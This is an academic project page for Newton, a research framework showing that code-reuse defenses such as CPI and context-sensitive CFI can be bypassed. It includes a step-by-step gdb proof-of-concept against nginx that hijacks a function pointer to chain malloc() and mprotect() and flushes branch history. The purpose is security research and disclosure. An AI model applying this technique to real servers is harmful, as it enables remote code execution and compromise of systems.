Project Description
In 2007, Shacham published a seminal paper on Return-Oriented Programming (ROP), the first systematic formulation of code reuse. The paper has been highly influential, profoundly shaping the way we still think about code reuse today: an attacker analyzes the “geometry” of victim binary code to locate gadgets and chains these to craft an exploit. This model has spurred much research, with a rapid progression of increasingly sophisticated code reuse attacks and defenses over time. After ten years, the common perception is that state-of-the-art code reuse defenses are effective in significantly raising the bar and making attacks exceedingly hard.
In this paper, we challenge this perception and show that an attacker going beyond “geometry” (static analysis) and considering the “dynamics” (dynamic analysis) of a victim program can easily find function call gadgets even in the presence of state-of-the-art code-reuse defenses. To support our claims, we present Newton, a run-time gadget-discovery framework based on constraint-driven dynamic taint analysis. Newton can model a broad range of defenses by mapping their properties into simple, stackable, reusable constraints, and automatically generate gadgets that comply with these constraints. Using Newton, we systematically map and compare state-of-the-art defenses, demonstrating that even simple interactions with popular server programs are adequate for finding gadgets for all state-of-the-art code-reuse defenses. We conclude with an nginx case study, which shows that a Newton-enabled attacker can craft attacks which comply with the restrictions of advanced defenses, such as CPI and context-sensitive CFI.
Post Publication
With feedback from the community, received during and after presenting our work at CCS, we improved our paper by clarifying the following:
- We focus on the published implementation of CPI, which, as we verified, features no temporal checks and no read-side bounds checks. After publication, the CPI authors informed us that the latter, which we had assumed to be an optimization, is really an implementation bug. Unfortunately, adding such expensive bounds and temporal checks to approximate full memory safety will non-trivially increase the CPI overhead. For this reason, we consider the efficient published implementation a more interesting and concrete design point to analyze as of today.
- We consider context-sensitive CFI (CsCFI) and context-insensitive CFI separately and, with CsCFI, we exclusively refer to stateful CFI policies based on execution history.
Bypassing CsCFI
The above video demonstrates a proof-of-concept attack against nginx that bypasses context-sensitive CFI. We assume an arbitrary memory read/write primitive.
We use 5 terminals:
- [T1] runs the nginx server with gdb attached (to read, write and inspect memory)
- [T2] sends requests to the server to prepare the program state
- [T3-T5] send parallel requests to flush recorded branches
Chaining malloc()
We first start the nginx server and attach gdb to it in [T1]. We show in [T2] nginx’ memory map and observe the gap between the heap and libc. Next, we connect from [T2] to the server, but do not send any request yet. We interrupt execution in gdb to simulate the first data corruption:
# [T1] use arbitrary memory read/write primitive to overwrite
# the send_chain function pointer in the connection structure.
# This will redirect the following callsite (in
# http/ngx_http_write_filter_module.c):
#
# chain = c->send_chain(c, r->out, limit);
#
# We overwrite it to point to malloc() and do not worry about
# its argument: this will be a pointer to the connection
# structure stored on the heap (c in the callsite, 0x565fe958
# in our run). It will trigger a large allocation between the
# heap and libc.
set *((int *)0x565fe974) = 0xf7ff2180
# [T1] break on the callsite
break *0x56589b13
# [T1] break on malloc()
break *0xf7ff2180
# [T1] continue
c
We then flush any history by opening connections in parallel in [T3-T5], and sending requests over them. Each request hits the c->send_chain()
breakpoint, so we need to continue the debugger 3 times. Note that control-flow is not diverted for these connections (we do not hit our malloc()
breakpoint). This shows that our exploit is 1) connection-depedent, and 2) capable of ‘removing’ branch history used in Context-Sensitive CFI.
Once branch history is flushed, we send a request from the open connection in [T2]. This diverts control-flow to malloc
. After closing the connection in [T2], we highlight the changes in nginx’ mapping: we can now read/write in the 0xa170c000-f7d0b000
memory range, which is adjecent to libc.
Chaining mprotect()
We continue in [T2] by invoking partial.py, a python script that 1) connects to nginx, 2) waits for user input, 3) sends a partial HTTP request, 4) sleeps for 60 seconds, and 5) finishes the request. Before sending anything, we interrupt execution in gdb to simulate data corruption:
# [T1] use arbitrary memory read/write primitive to overwrite
# the send_chain function pointer again. We will now overwrite
# it to point to mprotect:
#
# int mprotect(void *addr, size_t len, int prot);
#
# set *((int *)0x565fe974) = 0xf7df3710
# The idea is to mprotect our newly malloc()'ed area + code
# pages of libc so that we can place our shellcode near an
# often-called libc function. Recall the original callsite:
#
# chain = c->send_chain(c, r->out, limit);
#
# We cannot control r->out, but since this is a pointer to a
# ngx_chain_t in our HTTP request structure, we can use our
# arbitrary memory read/write primitive to read its value. In
# our run, it is 0x565f3320.
#
# We can control c by creating a counterfeit connection
# structure somewhere on the heap/stack and updating the
# ngx_event_t *rev field that is used in ngx_http_init_request
# to set c.
#
# By moving the counterfeit structure around in memory, we
# control the first two arguments to mprotect(): to mprotect
# up to 0xf7eb6000 (the end of libc), we should put our
# counterfeit structure at 0xf7eb6000 - 0x565f3320 = 0xa18c2ce0,
# which we round to 0xa18c2000 to get an address at the 4KB page
# granularity. We can use our malloc()'ed region for this, since
# it starts before this address (at 0xa170c000). Note that if
# this was not the case (e.g., on 64-bit), we could repeat our
# malloc() primitive multiples times until we gain the desired
# memory layout.
# [T1] copy the connection struct to the newly allocated area
call memcpy(0xa18c2000, 0x565fe958, 88)
# [T1] Update our ngx_event_t *rev so that our counterfeit
# structure will be used
set *((int *)0x56614918) = 0xa18c2000
# [T1] break on mprotect
break *0xf7df3710
# [T1] continue
c
We now press return in [T2] to trigger a partial request. We immediately move back to gdb to simulate another data corruption. This time, we modify request-specific fields:
# The last bit is forcing mprotect to apply the protection flag
# 0x7 (read, write, execute) to the provided region. For this,
# we must control the limit argument in the c->send_chain(c, r->out,
# limit); callsite. In http/ngx_http_write_filter_module.c, we find:
#
# if (r->limit_rate)
# limit = r->limit_rate * (ngx_time() - r->start_sec + 1)
# - (c->sent - clcf->limit_rate_after);
#
# After sending a partial request, we can use our primitive to
# control:
# r->limit_rate
# c->sent
# clcf->limit_rate_after
# In addition, by extending the time between sending a partial
# request and finishing it, we can also control the outcome of:
# (ngx_time() - r->start-sec + 1)
# For example, if we finish the partial request after exactly 60
# seconds, the result of the above will be 61.
#
# We can now evaluate the limit variable to 0x7:
# set r->limit_rate to 1
# set c->sent to 54 (0x36)
# set clcf->limit_rate_after to 0 (default)
# This results in:
# limit = 1 * (60 + 1) - (54 - 0) = 7
#
# [T1] overwrite r->limit_rate
set *((int *)0x565ec8b4) = 0x1
# overwrite c->sent
set *((int *)0xa18c2024) = 0x36
# [T1] continue
c
We now again flush any recorded branch history by firing parallel requests in [T3-T5] and then wait for the timer in [T2] to finish. Once this request is sent, we see in [T1] that mprotect is called with argument (0xa18c2000, 0x565f3320, 0x7) which makes the entire region starting from 0xa18c2000 all the way to the end of libc readable, writable, and executable. We show this in [T2].
From here, an attacker can insert his shellcode in libc.
Papers
Acknowledgements
This work was supported by the Netherlands Organisation for Scientific Research through grants NWO 639.023.309 VICI “Dowsing” and NWO CSI-DHS 628.001.021, and by the European Commission through project H2020 ICT-32-2014 “SHARCS” under Grant Agreement No. 644571. The public artifacts reflect only the authors’ view. The funding agencies are not responsible for any use that may be made of the information they contain.